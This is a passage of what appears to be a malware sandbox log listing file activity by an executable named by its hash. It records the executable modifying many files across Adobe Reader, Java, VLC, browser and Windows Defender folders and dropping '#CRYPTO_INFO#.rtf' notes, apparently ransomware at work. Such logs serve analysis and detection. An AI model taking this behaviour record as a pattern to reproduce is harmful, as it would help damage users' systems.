8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HighBeamCardLogo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_HK.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_thumbnailview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\CopyLimit.wpl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\net.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_opencarat_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_listview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\klist.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\content-types.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\SearchClose.vssm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\am_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\README.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_tw_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files 